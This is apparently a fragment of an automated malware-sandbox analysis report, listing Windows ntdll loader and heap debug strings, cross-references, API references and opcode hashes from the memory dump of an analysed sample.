                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01208181, 012081F5
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 012081E5
                                                              • LdrpInitializeImportRedirection, xrefs: 01208177, 012081EB
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011CC6C3
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01208170
                                                              • LdrpInitializeProcess, xrefs: 011CC6C4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              APIs
                                                                • Part of subcall function 011D2DF0: LdrInitializeThunk.NTDLL ref: 011D2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0D74
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              Strings
                                                              • @, xrefs: 011C8591
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011C8421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 011C855E
                                                              • LdrpInitializeProcess, xrefs: 011C8422
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • .Local, xrefs: 011C28D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012022B6
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012021D9, 012022B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 012021DE
                                                              Strings
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0120342A
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01203437
                                                              • RtlDeactivateActivationContext, xrefs: 01203425, 01203432, 01203451
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01203456
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011F0FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011F10AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011F106B
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011F1028
                                                              Strings
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 0120365C
                                                              • LdrpFindDllActivationContext, xrefs: 01203636, 01203662
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01203640, 0120366C
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0120362F
                                                              Strings
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011FA992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011FA9A2
                                                              • apphelp.dll, xrefs: 011B2462
                                                              • LdrpDynamicShimModule, xrefs: 011FA998
                                                              Strings
                                                              • HEAP: , xrefs: 011A3264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 011A327D
                                                              • HEAP[%wZ]: , xrefs: 011A3255
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 011FA10F
                                                              • LdrpCheckModule, xrefs: 011FA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011FA121
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 012082E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 012082DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 012082D7
                                                              Strings
                                                              • @, xrefs: 0124C1F1
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0124C1C5
                                                              • PreferredUILanguages, xrefs: 0124C212
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01214899
                                                              • LdrpCheckRedirection, xrefs: 0121488F
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01214888
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 012120FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01212104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 012120F3
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 0119AA13
                                                              • LdrResSearchResource Exit, xrefs: 0119AA25
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              Strings
                                                              • kLsE, xrefs: 01190540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0119063D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0119A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0119A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0121895E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: 4213ccfdd3b52023777f21c3ba15b267cc165f0e6b4aae5be596ffa15e2f0b20
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: 26F16C70E0021A9BDB1DCF99C5D0BEEBBF5AF48714F098129EA06AB741E774D841CB64
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09e8e750faa71e37b41f438563eaeb703c2817fc6ff8e691c1b7d234429705ed
                                                              • Instruction ID: 264cd566bfa3d5e1954558ede9345e72c42c3540f88f0ad89ac32b22f6475762
                                                              • Opcode Fuzzy Hash: 09e8e750faa71e37b41f438563eaeb703c2817fc6ff8e691c1b7d234429705ed
                                                              • Instruction Fuzzy Hash: C5D1F471E2062AABDF19CF68C841AFEB7F1BF88304F188169D955E7241EB35E905CB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 477b6250ba6c763ca370638584f8afc26bb1f47364e1e5f7352effdb369937f1
                                                              • Instruction ID: a71a8f30fe2edaca773c210cf71d0c5f7e8697b47041b8f4f4da2fc938284210
                                                              • Opcode Fuzzy Hash: 477b6250ba6c763ca370638584f8afc26bb1f47364e1e5f7352effdb369937f1
                                                              • Instruction Fuzzy Hash: 74E19371508341DFCB19CF28C490A6ABBE1FF89318F15896DF5A587351E731E905CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48d2675c3bfb3f48489edb97adc518af5a0d0f55cd1b91dc35b8860a6258edcc
                                                              • Instruction ID: c5a515cda5cdc3d6abeb11a496e24c7705ba54de17cf5ac5bf4ac25d3374c03a
                                                              • Opcode Fuzzy Hash: 48d2675c3bfb3f48489edb97adc518af5a0d0f55cd1b91dc35b8860a6258edcc
                                                              • Instruction Fuzzy Hash: CDD1F571A00A069BDB1CEFA9C880BBA77F5BF54308F45862DE916DB280E734E951CF50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: b7c2f32cc9c861d923969fa9dc9dfa425fc5d00f937d0d6063ff8d84e96bea96
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 99B1B575A10605AFDB25DF58C980EAFBBF9FFA4304F10441EAA4297798DB35E905CB10
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 50cdfe53c21526b44246e99f9db9381ead511f45815376d6f55264680443f9c8
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 8BB12635600646AFDB2DCBA8C850BBFBFF6AF88304F550159E696D7281DB30E941CB91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c794cb2d5031655504d4491a97f15d8776c4ad741c23cf23aa3b8ce92646c2c
                                                              • Instruction ID: 5f16ab92343a0e30d1faeeb84771963eb61bf28ccdcc48d14242396dc9a12662
                                                              • Opcode Fuzzy Hash: 2c794cb2d5031655504d4491a97f15d8776c4ad741c23cf23aa3b8ce92646c2c
                                                              • Instruction Fuzzy Hash: 3AC16970208345DFE768CF19C484BABB7E5BF88304F44496DEA9987291D774E909CFA2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8aaffc6875007dcb9052359e20b376fedbbb9ba565ffeadb321d63792d89dfd
                                                              • Instruction ID: fdee5bddd9dbb8966a80af971a62e3c7ad8b91a97cc6cd5cce6b8329917e071a
                                                              • Opcode Fuzzy Hash: e8aaffc6875007dcb9052359e20b376fedbbb9ba565ffeadb321d63792d89dfd
                                                              • Instruction Fuzzy Hash: 53B16070B006668BDB68DF68C890BE9B7F5AF44704F04C5E9D50AA7281EB309D85CF71
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9bef50d5d0462546568037dba795b557b303167af225f5d1a2a602ab2754f112
                                                              • Instruction ID: 680930837ecbfc994ffca316d53409ef0519d4a4570d1291e19643b2d6b7304b
                                                              • Opcode Fuzzy Hash: 9bef50d5d0462546568037dba795b557b303167af225f5d1a2a602ab2754f112
                                                              • Instruction Fuzzy Hash: F4A11732E0161A9FEB2DDB98C888FEDBBB4BB01714F050119EB11AB291D7B49D41CBD1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d561ae2bef5a0227f5e1a308382fbcdec16dcfe8746688944608365b24c0d585
                                                              • Instruction ID: ce3c7cc0de0afa1739ee30bd5fb26b016aca2552384af50afdb40d835ac04321
                                                              • Opcode Fuzzy Hash: d561ae2bef5a0227f5e1a308382fbcdec16dcfe8746688944608365b24c0d585
                                                              • Instruction Fuzzy Hash: E3A1F371B016169FDB2DDF69C890BBAB7B5FF58318F004129EA4AD7282DB34E841CB41
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49fa53ff024110b9824c8e8766b4df9a247a6fd179457c5e77f8bac0869e5000
                                                              • Instruction ID: 78d9b064616f1de042317483b014916a13bc33652f34924d135e1bd3734ddc58
                                                              • Opcode Fuzzy Hash: 49fa53ff024110b9824c8e8766b4df9a247a6fd179457c5e77f8bac0869e5000
                                                              • Instruction Fuzzy Hash: D9A1F472A24292DFC716EF18CD80B5ABBE9FF58708F444529F6859B690C334ED81CB91
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 570224d11d50f7c3f2707ee1ecc9aeb53118154d9b3c3c57c5dae95e1a185351
                                                              • Instruction ID: 63d2f6b2a7d4a8b7ca686de017e2149f546eac081d647a7b62b8780b87d1a361
                                                              • Opcode Fuzzy Hash: 570224d11d50f7c3f2707ee1ecc9aeb53118154d9b3c3c57c5dae95e1a185351
                                                              • Instruction Fuzzy Hash: 0091B271D10216AFDB15CFA8D884BBEBFF9AF58710F154169EA10EB345D7B4D9008BA0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57af335ffe2b83f44cd5c71d990a347f7d36dbd9092906c4be3379cda6560d47
                                                              • Instruction ID: 362368b8f9f30ab46a38e1471e83b1c38dca76274dffa49273168ad2ead0addb
                                                              • Opcode Fuzzy Hash: 57af335ffe2b83f44cd5c71d990a347f7d36dbd9092906c4be3379cda6560d47
                                                              • Instruction Fuzzy Hash: 00914539A0161ACBEB2CEB68D440BBD7FA1FF94718F468069EA45DB281F734D801CB51
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0413f6e0c1aa18e8c543b62b96687d9f705583457182a950c1b5dafde1ad33fb
                                                              • Instruction ID: 0fec2038d5b986ac0f972fecc1e235e641ae420bb95a9718125e5c99e4c56999
                                                              • Opcode Fuzzy Hash: 0413f6e0c1aa18e8c543b62b96687d9f705583457182a950c1b5dafde1ad33fb
                                                              • Instruction Fuzzy Hash: 16819171A0061A9BDB2CCFA9C854ABEBBF9FB58700F44852EE455E7640E334D940CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction ID: 7bc47ff4e5585ee83e13af81db97d6d76930341b04175bc24325fa856b20306d
                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction Fuzzy Hash: 18818231A2020A9FDF59DF99C4C2AAEBBF6BF94310F148669DD169B344D774E901CB80
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de92ce2d05bd9b3a0d8f5e05df8bc6c0b477af6a3a0a17116a9a0f6234ea2bd9
                                                              • Instruction ID: 737f32eca8d6f0f80ba314baaaceeff5a24bfdde821a9375cb6c3d7680c6ea07
                                                              • Opcode Fuzzy Hash: de92ce2d05bd9b3a0d8f5e05df8bc6c0b477af6a3a0a17116a9a0f6234ea2bd9
                                                              • Instruction Fuzzy Hash: 8D71D571604B1A9BDB2DDFA9C888B6FB7E4FB44358F054929EA55D7200D330E854CBD2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 045a0f4de6481490ba9903db2ffd57290921fa5dbc232036edbe7c14862433ae
                                                              • Instruction ID: 09d1325f927c81b09c6e4f761fd8ef6b2011456afa2e3359772521387f8ed221
                                                              • Opcode Fuzzy Hash: 045a0f4de6481490ba9903db2ffd57290921fa5dbc232036edbe7c14862433ae
                                                              • Instruction Fuzzy Hash: 1D819071A01609AFDB2ACFA8C880BEEBBBAFF58714F10442DE556A7251D730AC45CB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6c49231be14b031d98dba1aec6775064473abd9c2266ae2a5fa9a3eb476a6b1
                                                              • Instruction ID: 047525a37d52aa3f201e80ef3366fed74a022aa8418d8d821cf2b219626dc6cf
                                                              • Opcode Fuzzy Hash: a6c49231be14b031d98dba1aec6775064473abd9c2266ae2a5fa9a3eb476a6b1
                                                              • Instruction Fuzzy Hash: A571AC799056699BCB29CF98D8907FEBFB1FF58710F55415AE942AB390E7309800CBA0
                                                              Memory Dump Source
